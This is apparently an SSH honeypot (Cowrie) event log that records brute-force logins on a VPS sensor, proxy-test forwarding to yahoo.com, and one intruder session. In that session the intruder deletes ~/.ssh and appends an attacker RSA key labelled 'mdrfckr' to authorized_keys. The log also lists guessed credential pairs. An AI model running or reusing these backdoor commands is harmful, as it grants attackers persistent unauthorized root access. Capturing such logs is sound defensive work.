{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:06:13.708388Z","src_ip":"212.227.235.229","session":"1e66a487164e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:06:14.970842Z","src_ip":"212.227.235.229","session":"1e66a487164e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42106,"dst_ip":"1.2.3.4","dst_port":22,"session":"687994681a91","protocol":"ssh","message":"New connection: 212.227.235.229:42106 (1.2.3.4:22) [session: 687994681a91]","sensor":"my-vps","timestamp":"2025-08-26T05:06:15.231101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:06:15.231788Z","src_ip":"212.227.235.229","session":"687994681a91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:06:16.475353Z","src_ip":"212.227.235.229","session":"687994681a91"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:06:17.258422Z","src_ip":"212.227.235.229","session":"687994681a91"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:06:17.520757Z","src_ip":"212.227.235.229","session":"687994681a91"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:06:17.524290Z","src_ip":"212.227.235.229","session":"0a2ce8d89eab"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":54428,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1935bc9cdc7","protocol":"ssh","message":"New connection: 93.123.109.181:54428 (1.2.3.4:22) [session: e1935bc9cdc7]","sensor":"my-vps","timestamp":"2025-08-26T05:10:21.743625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:10:21.747251Z","src_ip":"93.123.109.181","session":"e1935bc9cdc7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:10:21.767003Z","src_ip":"93.123.109.181","session":"e1935bc9cdc7"}
{"eventid":"cowrie.login.failed","username":"validator","password":"validator","message":"login attempt [validator/validator] failed","sensor":"my-vps","timestamp":"2025-08-26T05:10:21.839889Z","src_ip":"93.123.109.181","session":"e1935bc9cdc7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:10:22.862550Z","src_ip":"93.123.109.181","session":"e1935bc9cdc7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27068,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d308dd757ca","protocol":"ssh","message":"New connection: 213.209.150.239:27068 (1.2.3.4:22) [session: 8d308dd757ca]","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.284898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.285555Z","src_ip":"213.209.150.239","session":"8d308dd757ca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.342545Z","src_ip":"213.209.150.239","session":"8d308dd757ca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.625391Z","src_ip":"213.209.150.239","session":"8d308dd757ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29250,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29250","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.684256Z","session":"8d308dd757ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.740977Z","src_ip":"213.209.150.239","session":"8d308dd757ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":11786,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11786","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.895084Z","session":"8d308dd757ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T05:11:09.952284Z","src_ip":"213.209.150.239","session":"8d308dd757ca"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:11:10.010577Z","src_ip":"213.209.150.239","session":"8d308dd757ca"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64296,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e509971b03","protocol":"ssh","message":"New connection: 217.72.205.35:64296 (1.2.3.4:22) [session: b9e509971b03]","sensor":"my-vps","timestamp":"2025-08-26T05:11:58.322256Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:11:58.323574Z","src_ip":"217.72.205.35","session":"b9e509971b03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46838,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dab1500be93","protocol":"ssh","message":"New connection: 212.227.235.229:46838 (1.2.3.4:22) [session: 7dab1500be93]","sensor":"my-vps","timestamp":"2025-08-26T05:12:24.076518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:12:24.077502Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:12:24.314267Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.login.success","username":"root","password":"Asd@123321","message":"login attempt [root/Asd@123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:12:25.264241Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:12:25.767155Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:12:25.768041Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:12:25.769343Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:26.008868Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:12:26.595329Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:12:26.596394Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:12:26.835766Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:26.836693Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48276,"dst_ip":"1.2.3.4","dst_port":22,"session":"439b85f3f2e1","protocol":"ssh","message":"New connection: 212.227.235.229:48276 (1.2.3.4:22) [session: 439b85f3f2e1]","sensor":"my-vps","timestamp":"2025-08-26T05:12:27.072120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:12:27.072904Z","src_ip":"212.227.235.229","session":"439b85f3f2e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:12:27.310282Z","src_ip":"212.227.235.229","session":"439b85f3f2e1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:12:28.299042Z","src_ip":"212.227.235.229","session":"439b85f3f2e1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:29.539653Z","src_ip":"212.227.235.229","session":"439b85f3f2e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48814,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f8ef8a52297","protocol":"ssh","message":"New connection: 212.227.235.229:48814 (1.2.3.4:22) [session: 3f8ef8a52297]","sensor":"my-vps","timestamp":"2025-08-26T05:12:29.775272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:12:29.776203Z","src_ip":"212.227.235.229","session":"3f8ef8a52297"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:12:30.012223Z","src_ip":"212.227.235.229","session":"3f8ef8a52297"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:12:30.999620Z","src_ip":"212.227.235.229","session":"3f8ef8a52297"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:31.238238Z","src_ip":"212.227.235.229","session":"7dab1500be93"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:31.239113Z","src_ip":"212.227.235.229","session":"3f8ef8a52297"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35836,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0afefec31c4","protocol":"ssh","message":"New connection: 212.227.235.229:35836 (1.2.3.4:22) [session: f0afefec31c4]","sensor":"my-vps","timestamp":"2025-08-26T05:12:32.722422Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-26T05:12:32.723357Z","src_ip":"212.227.235.229","session":"f0afefec31c4"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:32.724049Z","src_ip":"212.227.235.229","session":"f0afefec31c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9216,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef8e4327e284","protocol":"ssh","message":"New connection: 212.227.235.229:9216 (1.2.3.4:22) [session: ef8e4327e284]","sensor":"my-vps","timestamp":"2025-08-26T05:12:35.671333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T05:12:35.672008Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T05:12:35.802547Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"12345","message":"login attempt [ryan/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T05:12:36.405878Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abc123","message":"login attempt [ryan/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T05:12:37.541662Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abcd123","message":"login attempt [ryan/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T05:12:38.673656Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abcd1234","message":"login attempt [ryan/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T05:12:39.806148Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abc1234","message":"login attempt [ryan/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T05:12:40.937156Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
